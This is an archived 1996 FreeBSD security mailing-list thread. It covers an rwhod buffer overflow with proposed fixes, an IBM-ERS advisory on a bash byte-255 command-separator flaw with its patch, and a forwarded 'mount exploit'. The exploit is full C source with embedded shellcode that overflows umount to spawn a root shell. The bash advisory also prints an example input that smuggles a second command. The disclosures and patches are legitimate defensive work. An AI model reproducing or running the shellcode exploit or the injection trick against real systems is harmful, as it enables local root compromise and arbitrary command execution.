From owner-freebsd-security Tue Aug 20 08:21:10 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA05571 for security-outgoing; Tue, 20 Aug 1996 08:21:10 -0700 (PDT) Received: from sovcom.kiae.su (sovcom.kiae.su [193.125.152.1]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA05564; Tue, 20 Aug 1996 08:21:05 -0700 (PDT) Received: by sovcom.kiae.su id AA03108 (5.65.kiae-1 ); Tue, 20 Aug 1996 18:10:44 +0300 Received: by sovcom.KIAE.su (UUMAIL/2.0); Tue, 20 Aug 96 18:10:43 +0300 Received: (from ache@localhost) by nagual.ru (8.7.5/8.7.3) id TAA00886; Tue, 20 Aug 1996 19:09:29 +0400 (MSD) Message-Id: <199608201509.TAA00886@nagual.ru> Subject: Re: Secure telnet duplicating: secure & eBones both... In-Reply-To: <199608201449.QAA24308@grumble.grondar.za> from "Mark Murray" at "Aug 20, 96 04:49:38 pm" To: mark@grondar.za (Mark Murray) Date: Tue, 20 Aug 1996 19:09:29 +0400 (MSD) Cc: current@freebsd.org, security@freebsd.org From: =?KOI8-R?Q?=E1=CE=C4=D2=C5=CA_=FE=C5=D2=CE=CF=D7?= (Andrey A. Chernov) Organization: self X-Class: Fast X-Mailer: ELM [version 2.4ME+ PL25 (25)] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Whatever happens, sno matter how many security features are in Secure Telnet, > it will still require the Kerberos libraries. It NOT require Kerberos libraries, please look close into Makefiles. I see no reason again for moving it into eBones. -- Andrey A. Chernov http://www.nagual.ru/~ache/ From owner-freebsd-security Wed Aug 21 13:45:10 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA25174 for security-outgoing; Wed, 21 Aug 1996 13:45:10 -0700 (PDT) Received: from phoenix.iss.net (phoenix.iss.net [204.241.60.5]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id NAA25165 for ; Wed, 21 Aug 1996 13:45:03 -0700 (PDT) Received: (from davem@localhost) by phoenix.iss.net (8.6.13/8.6.12) id QAA01683; Wed, 21 Aug 1996 16:39:01 -0400 Date: Wed, 21 Aug 1996 16:38:57 -0400 (EDT) From: "David J. Meltzer" To: bugtraq@netspace.org, linux-security@tarsier.cv.nrao.edu, freebsd-security@freebsd.org, deraadt@theos.com Subject: rwhod buffer overflow In-Reply-To: <199607240541.BAA18220@hcs.HARVARD.EDU> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk There is a remote buffer overflow in the path variable in rwhod.c in the line: (void) sprintf(path, "whod.%s", wd.wd_hostname); Although wd_hostname is defined to be only 32 characters, it is read as part of the wd structure from a remote host through a UDP packet and can be as large as the remainder of the structure starting at that point. Through examining the source this appears to be a problem in current OpenBSD, NetBSD, FreeBSD, and Linux distributions. Through penetration testing I have also found this problem present on AIX; I have not examined other platforms running rwhod and so do not know about their potential vulnerability. I have succesfully exploited this remotely to produce undesirable effects (segfaults and overwriting argv[0] on different OSes), I have not spent sufficient time on this to determine exactly how/if to compromise root directly with this overflow, but it is definitely something that should be corrected. I would suggest prior to the sprintf line you add something to the effect: if(strlen(wd.wd_hostname) >= sizeof(wd.wd_hostname)) { syslog(LOG_WARNING, "possible hostname overflow attack apparently from %x", from.sin_addr); continue; } Program: /usr/sbin/rwhod Affected Operating Systems: OpenBSD, NetBSD, FreeBSD, Linux, AIX, others. rwhod must be running on the system Requirements: Ability to send UDP packet to target host Security Compromise: Possible denial of service, Possible annoyance, Possibly root compromise? Author: Dave M. (davem@iss.net) Synopsis: rwhod reads a structure from a udp packet and does not check the hostname member of the structure for being the expected size. --------------------------------+--------------------- David J. Meltzer | Email: davem@iss.net Systems Engineer | Web: www.iss.net Internet Security Systems, Inc. | Fax: (404)252-2427 --------------------------------+--------------------- David J. Meltzer | Email: davem@iss.net Systems Engineer | Web: www.iss.net Internet Security Systems, Inc. | Fax: (404)252-2427 From owner-freebsd-security Wed Aug 21 16:02:28 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA10199 for security-outgoing; Wed, 21 Aug 1996 16:02:28 -0700 (PDT) Received: from hcs.harvard.edu (hcs.harvard.edu [140.247.73.252]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA10192 for ; Wed, 21 Aug 1996 16:02:25 -0700 (PDT) Received: (from dholland@localhost) by hcs.harvard.edu (8.7.4/8.7.3) id TAA09928; Wed, 21 Aug 1996 19:02:16 -0400 From: David Holland Message-Id: <199608212302.TAA09928@hcs.harvard.edu> Subject: Re: rwhod buffer overflow To: bugtraq@netspace.org, linux-security@tarsier.cv.NRAO.edu, freebsd-security@freebsd.org, deraadt@theos.com Date: Wed, 21 Aug 1996 19:02:15 -0400 (EDT) X-Mailer: ELM [version 2.4 PL22] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Through examining the source this appears to be a problem in current > OpenBSD, NetBSD, FreeBSD, and Linux distributions. Yes - I only found the bug last week. I was waiting to post it until I could track down an appropriate FreeBSD contact to get the fixes applied. Ah well. The fixed Linux version will be released in NetKit-B-0.08 tonight. The NetKit-B release has been delayed by considerations over the RESOLV_HOST_CONF problem. :( I know the fix has been applied to OpenBSD, and it's at least been sent to NetBSD... -- - David A. Holland | Number of words in the English language that dholland@hcs.harvard.edu | exist because of typos or misreadings: 381 From owner-freebsd-security Wed Aug 21 19:12:45 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA02086 for security-outgoing; Wed, 21 Aug 1996 19:12:45 -0700 (PDT) Received: from sparc.eunet.si (sparc.eunet.si [193.77.2.66]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id TAA02081 for ; Wed, 21 Aug 1996 19:12:41 -0700 (PDT) Received: from FRAJER.nil.si (mail-gw.nil.si [193.77.3.74]) by sparc.eunet.si (8.6.8/8.7.3) with SMTP id EAA03742 for ; Thu, 22 Aug 1996 04:17:53 +0200 X-From: Received: from pdx1.world.net by mail-gw.nil.si (Promail gateway v1.4.1) with SMTP ; Thu, 22 Aug 96 04:12:20 -0400 Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id TAA02686; Wed, 21 Aug 1996 19:13:20 -0700 (PDT) Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id KAA30626; Thu, 22 Aug 1996 10:54:43 +1000 Resent-Date: Thu, 22 Aug 1996 10:54:43 +1000 Approved-By: ALEPH1@UNDERGROUND.ORG Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Approved-By: "David J. Meltzer" Message-Id: Date: Wed, 21 Aug 1996 16:38:57 -0400 Reply-To: Bugtraq List From: "David J. Meltzer" To: Multiple recipients of list BUGTRAQ In-Reply-To: <199607240541.BAA18220@hcs.HARVARD.EDU> Resent-Message-Id: <"yhhSK1.0.VU7.I_w6o"@suburbia> Resent-From: best-of-security@suburbia.net X-Mailing-List: archive/latest/243 X-Loop: best-of-security@suburbia.net Resent-Sender: best-of-security-request@suburbia.net Subject: BoS: rwhod buffer overflow Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk There is a remote buffer overflow in the path variable in rwhod.c in the line: (void) sprintf(path, "whod.%s", wd.wd_hostname); Although wd_hostname is defined to be only 32 characters, it is read as part of the wd structure from a remote host through a UDP packet and can be as large as the remainder of the structure starting at that point. Through examining the source this appears to be a problem in current OpenBSD, NetBSD, FreeBSD, and Linux distributions. Through penetration testing I have also found this problem present on AIX; I have not examined other platforms running rwhod and so do not know about their potential vulnerability. I have succesfully exploited this remotely to produce undesirable effects (segfaults and overwriting argv[0] on different OSes), I have not spent sufficient time on this to determine exactly how/if to compromise root directly with this overflow, but it is definitely something that should be corrected. I would suggest prior to the sprintf line you add something to the effect: if(strlen(wd.wd_hostname) >= sizeof(wd.wd_hostname)) { syslog(LOG_WARNING, "possible hostname overflow attack apparently from %x", from.sin_addr); continue; } Program: /usr/sbin/rwhod Affected Operating Systems: OpenBSD, NetBSD, FreeBSD, Linux, AIX, others. rwhod must be running on the system Requirements: Ability to send UDP packet to target host Security Compromise: Possible denial of service, Possible annoyance, Possibly root compromise? Author: Dave M. (davem@iss.net) Synopsis: rwhod reads a structure from a udp packet and does not check the hostname member of the structure for being the expected size. --------------------------------+--------------------- David J. Meltzer | Email: davem@iss.net Systems Engineer | Web: www.iss.net Internet Security Systems, Inc. | Fax: (404)252-2427 --------------------------------+--------------------- David J. Meltzer | Email: davem@iss.net Systems Engineer | Web: www.iss.net Internet Security Systems, Inc. | Fax: (404)252-2427 From owner-freebsd-security Thu Aug 22 09:07:40 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA24139 for security-outgoing; Thu, 22 Aug 1996 09:07:40 -0700 (PDT) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id JAA24125; Thu, 22 Aug 1996 09:07:31 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.7.5/8.6.10) with SMTP id JAA02475; Thu, 22 Aug 1996 09:07:30 -0700 (PDT) From: Cy Schubert - ITSD Open Systems Group Message-Id: <199608221607.JAA02475@passer.osg.gov.bc.ca> X-Authentication-Warning: passer.osg.gov.bc.ca: Host localhost [127.0.0.1] didn't use HELO protocol Reply-to: cschuber@orca.gov.bc.ca X-Mailer: DXmail To: security-officer@freebsd.org cc: freebsd-security@freebsd.org Subject: Mycroftish description of bash hole. Date: Thu, 22 Aug 96 09:07:29 -0700 X-Mts: smtp Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk This is an FYI for those of you who have installed the bash port. Regards, Phone: (604)389-3827 Cy Schubert OV/VM: BCSC02(CSCHUBER) Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET ITSD Internet: cschuber@uumail.gov.bc.ca cschuber@bcsc02.gov.bc.ca "Quit spooling around, JES do it." ------- Forwarded Message Return-Path: best-of-security-request@suburbia.net Delivery-Date: Thu, 22 Aug 96 06:54:38 -0700 Return-Path: best-of-security-request@suburbia.net Received: from orca.gov.bc.ca (ORCA.gov.bc.ca [142.32.102.25]) by passer.osg.gov.bc.ca (8.7.5/8.6.10) with SMTP id GAA01330 for ; Thu, 22 Aug 1996 06:54:28 -0700 (PDT) Received: from pdx1.world.net by orca.gov.bc.ca (5.4R3.10/200.1.1.4) id AA02344; Thu, 22 Aug 1996 02:12:11 -0700 Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id CAA17746; Thu, 22 Aug 1996 02:13:26 -0700 (PDT) Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id TAA03081; Thu, 22 Aug 1996 19:10:29 +1000 Resent-Date: Thu, 22 Aug 1996 19:10:29 +1000 From: "Matthew Aldous" Message-Id: <9608221626.ZM5530@discovery.mhri.edu.au> Date: Thu, 22 Aug 1996 16:26:56 -0400 X-Files: The Truth Is Out There X-Disclaimer: Comments contained do not necessarily represent those of my employer X-Copyright: Portions of this message may be subject to copyright. (C) 1996 Matthew Aldous X-Warning: Comments contained may be devoid of fact or truth. X-Url: http://www.mhri.edu.au X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: meditation@gnu.ai.mit.edu Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: proff@suburbia.net Resent-Message-Id: <"LiUCO2.0.6m.3G27o"@suburbia> Resent-From: best-of-security@suburbia.net X-Mailing-List: archive/latest/246 X-Loop: best-of-security@suburbia.net Precedence: list Resent-Sender: best-of-security-request@suburbia.net Subject: BoS: Mycroftish description of bash hole. Whilst I know you might not care for security problems on meditation, I just wanted to splode over the description of *why* this problem exists. (If you read section B, it's very mycroftish.) - ------------------------------------------------------------------------------ register char *string; vs. register unsigned char *string; - ------------------------------------------------------------------------------ Matt - -----BEGIN PGP SIGNED MESSAGE----- AUSCERT has received the following Alert from the IBM ERS team concerning a vulnerability in the GNU "bash" shell. It is passed on for your information. If you believe that your system has been compromised, contact AUSCERT or your representative in FIRST (Forum of Incident Response and Security Teams). AUSCERT maintains an anonymous FTP service which is found on: ftp://ftp.auscert.org.au/pub/. This archive contains past SERT and AUSCERT Advisories, and other computer security information. AUSCERT also maintains a World Wide Web service which is found on: http://www.auscert.org.au/. Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 4477 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AUSCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for emergencies. - - -- Begin Included Advisory -- - - --ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT-- - - ---EXTERNAL RELEASE---EXTERNAL RELEASE---EXTERNAL RELEASE---EXTERNAL RELEASE--- ======= ============ ====== ====== ======= ============== ======= ======= === === ==== ====== ====== === =========== ======= ======= === =========== === ======= === === === ==== === ===== === ======= ============== ===== === ===== ======= ============ ===== = ===== EMERGENCY RESPONSE SERVICE SECURITY VULNERABILITY ALERT 21 August 1996 13:00 GMT Number: ERS-SVA-E01-1996:004.1 =============================================================================== VULNERABILITY SUMMARY VULNERABILITY: A variable declaration error in "bash" allows the character with value 255 decimal to be used as a command separator. PLATFORMS: Bash 1.14.6 and earlier versions. SOLUTION: Apply the patch provided below. THREAT: When used in environments where users provide strings to be used as commands or arguments to commands, "bash" can be tricked into executing arbitrary commands. =============================================================================== DETAILED INFORMATION I. Description A. Introduction The GNU Project's Bourne Again SHell ("bash") is a drop-in replacement for the UNIX Bourne shell (/bin/sh). It offers the same syntax as the standard shell, but also includes additional functionality such as job control, command line editing, and history. Although "bash" can be compiled and installed on almost any UNIX platform, its most prevalent use is on "free" versions of UNIX such as Linux, where it has been installed as "/bin/sh" (the default shell for most uses). The "bash" source code is freely available from many sites on the Internet. B. Vulnerability Details There is a variable declaration error in the "yy_string_get()" function in the "parser.y" module of the "bash" source code. This function is responsible for parsing the user-provided command line into separate tokens (commands, special characters, arguments, etc.). The error involves the variable "string," which has been declared to be of type "char *." The "string" variable is used to traverse the character string containing the command line to be parsed. As characters are retrieved from this pointer, they are stored in a variable of type "int." On systems/compilers where the "char" type defaults to "signed char", this vaule will be sign-extended when it is assigned to the "int" variable. For character code 255 decimal (-1 in two's complement form), this sign extension results in the value (-1) being assigned to the integer. However, (-1) is used in other parts of the parser to indicate the end of a command. Thus, the character code 255 decimal (377 octal) will serve as an unintended command separator for commands given to "bash" via the "-c" option. For example, bash -c 'ls\377who' (where "\377" represents the single character with value 255 decimal) will execute two commands, "ls" and "who." II. Impact This unexpected command separator can be dangerous, especially on systems such as Linux where "bash" has been installed as "/bin/sh," when a program executes a command with a string provided by a user as an argument using the "system()" or "popen()" functions (or by calling "/bin/sh -c string" directly). This is especially true for the CGI programming interface in World Wide Web servers, many of which do not strip out characters with value 255 decimal. If a user sending data to the server can specify the character code 255 in a string that is passed to a shell, and that shell is "bash," the user can execute any arbitrary command with the user-id and permissions of the user running the server (frequently "root"). The "bash" built-in commands "eval," "source," and "fc" are also potentially vulnerable to this problem. III. Solutions A. How to alleviate the problem This problem can be alleviated by changing the declaration of the "string" variable in the "yy_string_get()" function from "char *" to "unsigned char *." B. Official fix from the "bash" maintainers The "bash" maintainers have told us they plan to fix this problem in Version 2.0 of "bash," but this will not be released for at least a few more months. C. Unofficial fix until the official version is released Until the "bash" maintainers release Version 2.0, this problem can be fixed by applying the patch below to the "bash" source code, recompiling the program, and installing the new version. The patch below is for Version 1.14.6 of "bash." Source code for this version can be obtained from ftp://prep.ai.mit.edu/pub/gnu/bash-1.14.6.tar.gz as well as many other sites around the Internet. - - ---------------------------------- cut here - ---------------------------------- *** parse.y.old Thu Nov 2 15:00:51 1995 - - --- parse.y Tue Aug 20 09:16:48 1996 *************** *** 904,910 **** static int yy_string_get () { ! register char *string; register int c; string = bash_input.location.string; - - --- 904,910 ---- static int yy_string_get () { ! register unsigned char *string; register int c; string = bash_input.location.string; - - ---------------------------------- cut here - ---------------------------------- To apply this patch, save the text between the two "--- cut here ---" lines to a file, change directories to the "bash" source directory, and issue the command patch < filename If you do not have the "patch" program, you can obtain it from ftp://prep.ai.mit.edu/pub/gnu/patch-2.1.tar.gz or you can apply the patch by hand. After applying the patch, recompile and reinstall the "bash" program by following the directions in the "INSTALL" file, included as part of the "bash" distribution. This patch is provided "AS IS" without warranty of any kind, including, without limitation, any implied warranties of merchantibility or fitness for a particular purpose. This advisory does not create or imply any support obligations or any other liability on the part of IBM or its subsidiaries. IV. Acknowledgements IBM-ERS would like to thank the IBM Global Security Analysis Laboratory at the IBM T. J. Watson Research Center for their discovery of this vulnerability, bringing it to our attention, providing the patch to fix it, and assistance in developing this alert. UNIX is a technology trademark of X/Open Company, Ltd. =============================================================================== IBM's Internet Emergency Response Service (IBM-ERS) is a subscription-based Internet security response service that includes computer security incident response and management, regular electronic verification of your Internet gateway(s), and security vulnerability alerts similar to this one that are tailored to your specific computing environment. By acting as an extension of your own internal security staff, IBM-ERS's team of Internet security experts helps you quickly detect and respond to attacks and exposures across your Internet connection(s). As a part of IBM's Business Recovery Services organization, the IBM Internet Emergency Response Service is a component of IBM's SecureWay(tm) line of security products and services. From hardware to software to consulting, SecureWay solutions can give you the assurance and expertise you need to protect your valuable business resources. To find out more about the IBM Internet Emergency Response Service, send an electronic mail message to ers-sales@vnet.ibm.com, or call 1-800-742-2493 (Prompt 4). IBM-ERS maintains a site on the World Wide Web at http://www.ers.ibm.com/. Visit the site for information about the service, copies of security alerts, team contact information, and other items. IBM-ERS uses Pretty Good Privacy* (PGP*) as the digital signature mechanism for security vulnerability alerts and other distributed information. The IBM-ERS PGP* public key is available from http://www.ers.ibm.com/team-info/pgpkey.html. "Pretty Good Privacy" and "PGP" are trademarks of Philip Zimmerman. IBM-ERS is a Member Team of the Forum of Incident Response and Security Teams (FIRST), a global organization established to foster cooperation and response coordination among computer security teams worldwide. Copyright 1996 International Business Machines Corporation. The information in this document is provided as a service to customers of the IBM Emergency Response Service. Neither International Business Machines Corporation, Integrated Systems Solutions Corporation, nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process contained herein, or represents that its use would not infringe any privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by IBM or its subsidiaries. The views and opinions of authors expressed herein do not necessarily state or reflect those of IBM or its subsidiaries, and may not be used for advertising or product endorsement purposes. The material in this security alert may be reproduced and distributed, without permission, in whole or in part, by other security incident response teams (both commercial and non-commercial), provided the above copyright is kept intact and due credit is given to IBM-ERS. This security alert may be reproduced and distributed, without permission, in its entirety only, by any person provided such reproduction and/or distribution is performed for non-commercial purposes and with the intent of increasing the awareness of the Internet community. - - ---EXTERNAL RELEASE---EXTERNAL RELEASE---EXTERNAL RELEASE---EXTERNAL RELEASE--- - - --ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT-- - - -- End Included Advisory -- - -----BEGIN PGP SIGNATURE----- Version: 2.6.2i Comment: Finger pgp@ftp.auscert.org.au to retrieve AUSCERT's public key iQCVAwUBMhx7xCh9+71yA2DNAQGktAP8D5SBbZRrdn9vgVzjMO6ZtapWmudSAlm+ QUmYzGebC9AxndCkciZX94CqAfdg/aBJY6i6/Z0+R8DHy1ndABbQ4iGirzot9I2V TIFUktCvxdifRGR4wTKLHTwFaFdW+b0R2GDhDsF05qf5vKF27qwameQKV0Smo3tA QpK8oLlQO4s= =/JYb - -----END PGP SIGNATURE----- - -- - ------------------------------------------------------------------------------- "System Administration: It's a dirty job, but someone said I had to do it." Matthew Aldous : 019339629 : mda@mhri.edu.au : Mental Health Research Institute - ------------------------------------------------------------------------------- ------- End of Forwarded Message From owner-freebsd-security Thu Aug 22 10:14:49 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA00679 for security-outgoing; Thu, 22 Aug 1996 10:14:49 -0700 (PDT) Received: from cais.cais.com ([199.0.216.4]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id KAA00674 for ; Thu, 22 Aug 1996 10:14:46 -0700 (PDT) Received: from cais2.cais.com (cais2.cais.com [199.0.216.200]) by cais.cais.com (8.6.10/8.6.5) with ESMTP id NAA29726; Thu, 22 Aug 1996 13:13:57 -0400 Received: from localhost (jsdy@localhost) by cais2.cais.com (8.6.5/8.6.5) id NAA29924; Thu, 22 Aug 1996 13:13:55 -0400 Date: Thu, 22 Aug 1996 13:13:55 -0400 From: "Joseph S. D. Yao" Message-Id: <199608221713.NAA29924@cais2.cais.com> To: bugtraq@netspace.org, davem@iss.net, deraadt@theos.com, freebsd-security@freebsd.org, linux-security@tarsier.cv.nrao.edu Subject: Re: [linux-security] rwhod buffer overflow Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > There is a remote buffer overflow in the path variable in rwhod.c in the > line: (void) sprintf(path, "whod.%s", wd.wd_hostname); ... > I would suggest prior to the sprintf line you add something to the effect: > if(strlen(wd.wd_hostname) >= sizeof(wd.wd_hostname)) { > syslog(LOG_WARNING, "possible hostname overflow attack apparently from %x", > from.sin_addr); > continue; > } You might also wish to modify the sprintf() as follows. Just because wd_hostname fits into wd doesn't mean (in some future revision) that it will fit into path. static char path_prefix[] = "whod."; (void) sprintf(path, "%s%.*s", path_prefix, sizeof(path) - sizeof(path_prefix), wd.wd_hostname); The above assumes that path is an array, rather than a pointer: I haven't looked. If it's a pointer, then change sizeof(path) to the defined constant that reliably defines the size of the array to which path points. This also neatly accounts for the terminating NUL, because that is measured in sizeof(path_prefix), but not copied over by "%s" in the sprintf() call. Yes, this will truncate some LONG host names. A better algorithm would find the combined lengths of the path_prefix + the hostname, allocate a buffer at least that long + 1 (if not already allocated), die or skip the host if the alloc fails (so many programs forget to check!!!), and then do the copy, freeing the buffer when [if] it's no longer being used. But that's a bigger patch than the above. [;-\] Joe Yao jsdy@cais.com - Joseph S. D. Yao From owner-freebsd-security Fri Aug 23 11:16:07 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA20039 for security-outgoing; Fri, 23 Aug 1996 11:16:07 -0700 (PDT) Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id LAA19623 for ; Fri, 23 Aug 1996 11:12:58 -0700 (PDT) Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id LAA04873 for ; Fri, 23 Aug 1996 11:12:21 -0700 (PDT) Received: from current1.whistle.com(207.76.205.22) by whistle.com via smap (V1.3) id sma004871; Fri Aug 23 11:12:21 1996 Message-ID: <321DF44B.6201DD56@whistle.com> Date: Fri, 23 Aug 1996 11:11:23 -0700 From: Julian Elischer Organization: Whistle Communications X-Mailer: Mozilla 3.0b6 (X11; I; FreeBSD 2.2-CURRENT i386) MIME-Version: 1.0 To: security@freebsd.org Subject: [Fwd: mount bug..] Content-Type: multipart/mixed; boundary="------------63DECDAD62319AC452BFA1D7" Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk This is a multi-part message in MIME format. --------------63DECDAD62319AC452BFA1D7 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit This doesn't work, but I'm wondering why it says it's for freeBSD.. did it work on an earlier version? (even with bin replaced by sbin) umount is not suid anyhow, but..... does anyone know about this? julian --------------63DECDAD62319AC452BFA1D7 Content-Type: message/rfc822 Content-Transfer-Encoding: 7bit Content-Disposition: inline Return-Path: adrian@wisdom.psinet.net.au Received: from whistle.com (whistle.whistle.com [207.76.205.131]) by alpo.whistle.com (8.7.5/8.7.3) with ESMTP id SAA17858 for ; Thu, 22 Aug 1996 18:50:59 -0700 (PDT) Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id SAA02009 for ; Thu, 22 Aug 1996 18:50:59 -0700 (PDT) Received: from gatekeeper.whistle.com(207.76.204.2) by whistle.com via smap (V1.3) id sma002007; Thu Aug 22 18:50:41 1996 Received: (from smap@localhost) by gatekeeper.whistle.com (8.7.5/8.6.12) id SAA12120 for ; Thu, 22 Aug 1996 18:50:41 -0700 (PDT) Received: from wisdom.psinet.net.au(203.19.29.2) by gatekeeper.whistle.com via smap (V1.3) id sma012118; Thu Aug 22 18:50:17 1996 Received: (from adrian@localhost) by wisdom.psinet.net.au (8.7/8.7) id JAA16860; Fri, 23 Aug 1996 09:52:16 +0800 From: Adrian Chadd Message-Id: <199608230152.JAA16860@wisdom.psinet.net.au> Subject: mount bug.. To: digger@omen.com.au, julian@whistle.com Date: Fri, 23 Aug 1996 09:52:16 +0800 (WST) X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Here is the source to try out on your system: /* Mount Exploit for Linux/FreeBSD, Jul 30 1996 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````""::::::::: :::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`:::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ :::::: :::::::...........:::...........:::...........::.......:......:.......:::::: :::::::::::::::::::::::::::::::::::::::::::::::;:::::::::::::::::::::::::::: Discovered and Coded by Bloodmask & Vio Covin 1996 */ #include #include #include #include #include #define PATH_MOUNT "/bin/umount" #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 u_long get_esp() { __asm__("movl %esp, %eax"); } main(int argc, char **argv) { u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; /* fill start of buffer with nops */ memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); /* stick asm code into the buffer */ for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; (void)alarm((u_int)0); printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n"); execl(PATH_MOUNT, "mount", buff, NULL); } Bsically it gives you a root shell.. might want to take a look at it. It works in Linux.. I don't have a freebsd system to try it out on at the moment however. Adrian Chadd --------------63DECDAD62319AC452BFA1D7-- From owner-freebsd-security Sat Aug 24 03:14:11 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id DAA25307 for security-outgoing; Sat, 24 Aug 1996 03:14:11 -0700 (PDT) Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id DAA25300 for ; Sat, 24 Aug 1996 03:14:06 -0700 (PDT) Received: by gvr.win.tue.nl (8.6.13/1.53) id MAA04792; Sat, 24 Aug 1996 12:13:56 +0200 From: guido@gvr.win.tue.nl (Guido van Rooij) Message-Id: <199608241013.MAA04792@gvr.win.tue.nl> Subject: Re: [Fwd: mount bug..] To: julian@whistle.com (Julian Elischer) Date: Sat, 24 Aug 1996 12:13:55 +0200 (MET DST) Cc: security@freebsd.org In-Reply-To: <321DF44B.6201DD56@whistle.com> from Julian Elischer at "Aug 23, 96 11:11:23 am" X-Mailer: ELM [version 2.4ME+ PL17 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Julian Elischer wrote: > This doesn't work, but I'm wondering why it says it's for freeBSD.. > did it work on an earlier version? (even with bin replaced by sbin) > > umount is not suid anyhow, but..... > does anyone know about this? Since they use umount to do the exploit I cannot imagine how they would ever get a root shell....umount is not suid. -Guido From owner-freebsd-security Sat Aug 24 04:23:30 1996 